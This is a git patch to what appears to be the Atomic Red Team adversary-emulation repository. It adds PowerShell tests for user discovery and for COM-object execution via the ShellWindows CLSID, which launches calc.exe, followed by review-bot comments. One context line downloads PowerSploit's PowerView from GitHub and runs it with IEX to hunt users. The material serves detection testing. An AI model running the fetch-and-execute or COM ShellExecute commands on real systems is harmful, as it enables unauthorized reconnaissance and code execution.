From a41a63ffd963011c6628c9895ebdcc29c0b60a5f Mon Sep 17 00:00:00 2001
From: tccontre <26181693+tccontre@users.noreply.github.com>
Date: Wed, 23 Mar 2022 18:44:16 +0100
Subject: [PATCH] Powershell tactics (#1825)
* Update T1112.yaml
* Update T1112.yaml
* typos
* Update T1033.yaml
* Update T1033.yaml
* Update T1546.015.yaml
* Update T1546.015.yaml
* Update T1033.yaml
* Update T1546.015.yaml
* Update T1546.015.yaml
* Update T1546.015.yaml
Co-authored-by: Carrie Roberts
---
 atomics/T1033/T1033.yaml | 23 +++++++++++++++++++++++
 atomics/T1546.015/T1546.015.yaml | 14 ++++++++++++++
 2 files changed, 37 insertions(+)
diff --git a/atomics/T1033/T1033.yaml b/atomics/T1033/T1033.yaml
index ce81d0b9..b7889c4b 100644
--- a/atomics/T1033/T1033.yaml
+++ b/atomics/T1033/T1033.yaml
@@ -51,3 +51,26 @@ atomic_tests:
 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose
 name: powershell
+- name: User Discovery With Env Vars PowerShell Script
+ auto_generated_guid: dcb6cdee-1fb0-4087-8bf8-88cfd136ba51
+ description: Use the PowerShell environment variables to identify the current logged user.
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ [System.Environment]::UserName | Out-File -FilePath .\CurrentactiveUser.txt
+ $env:UserName | Out-File -FilePath .\CurrentactiveUser.txt -Append
+ cleanup_command: |
+ Remove-Item -Path .\CurrentactiveUser.txt -Force
+ name: powershell
+- name: GetCurrent User with PowerShell Script
+ auto_generated_guid: 1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b
+ description: Use the PowerShell "GetCurrent" method of the WindowsIdentity .NET class to identify the logged user.
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ [System.Security.Principal.WindowsIdentity]::GetCurrent() | Out-File -FilePath .\CurrentUserObject.txt
+ cleanup_command: |
+ Remove-Item -Path .\CurrentUserObject.txt -Force
+ name: powershell
diff --git a/atomics/T1546.015/T1546.015.yaml b/atomics/T1546.015/T1546.015.yaml
index de7f79c0..b0d9caff 100644
--- a/atomics/T1546.015/T1546.015.yaml
+++ b/atomics/T1546.015/T1546.015.yaml
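Review bot: Both new `cleanup_command` blocks run `Remove-Item ... -Force` without `-ErrorAction Ignore`, so a cleanup after a failed or skipped executor, or one run from a different working directory (both `.\CurrentactiveUser.txt` and `.\CurrentUserObject.txt` are relative paths), prints a file-not-found error instead of succeeding quietly. The existing cleanup shown in the T1546.015 hunk of this same commit uses `-ErrorAction Ignore`, so `Remove-Item -Path .\CurrentactiveUser.txt -Force -ErrorAction Ignore` (and likewise for `.\CurrentUserObject.txt`) would be consistent with it. Both descriptions read awkwardly; `identify the currently logged-on user` would replace `identify the current logged user` and `identify the logged user`. It would also help defenders if each description noted that the commands are in-process .NET calls and cmdlets with no child process, so the telemetry this test is presumably meant to exercise is PowerShell script block logging rather than a process-creation event.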
@@ -40,3 +40,17 @@ atomic_tests:
 cleanup_command: |-
 Remove-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}' -Recurse -ErrorAction Ignore
 name: powershell
+- name: Powershell Execute COM Object
+ auto_generated_guid: 752191b1-7c71-445c-9dbe-21bb031b18eb
+ description: Use the PowerShell to execute COM CLSID object.
+ Reference: https://pentestlab.blog/2020/05/20/persistence-com-hijacking/
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ $o= [activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39"))
+ $item = $o.Item()
+ $item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0)
+ cleanup_command: |
+ Get-Process -Name "*calc" | Stop-Process
+ name: powershell
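Review bot: The `Reference:` continuation line under `description:` sits inside a plain (unquoted) scalar, and YAML does not permit `: ` within a plain multi-line scalar, so as written the file is likely to fail to load or to parse the URL as a nested key; indentation is not preserved in this rendering, so I cannot rule out that it is already a block scalar, but `description: |` with both lines indented beneath it is the safe form. The cleanup `Get-Process -Name "*calc" | Stop-Process` appears to miss the case where calc.exe hands off to the Store Calculator app, whose process name (`Calculator` / `CalculatorApp`) does not end in `calc`, and it errors when nothing matches; `Get-Process -Name "*calc*" -ErrorAction Ignore | Stop-Process` covers both and matches the `-ErrorAction Ignore` convention on the context line above. The description should also state what the hard-coded CLSID is (`9BA05972-F6A8-11CF-A442-00A0C90A8F39` is the ShellWindows object) and that the test only instantiates that stock object to spawn a child process rather than hijacking a CLSID registration, so readers do not expect the registry-based T1546.015 detections to fire here.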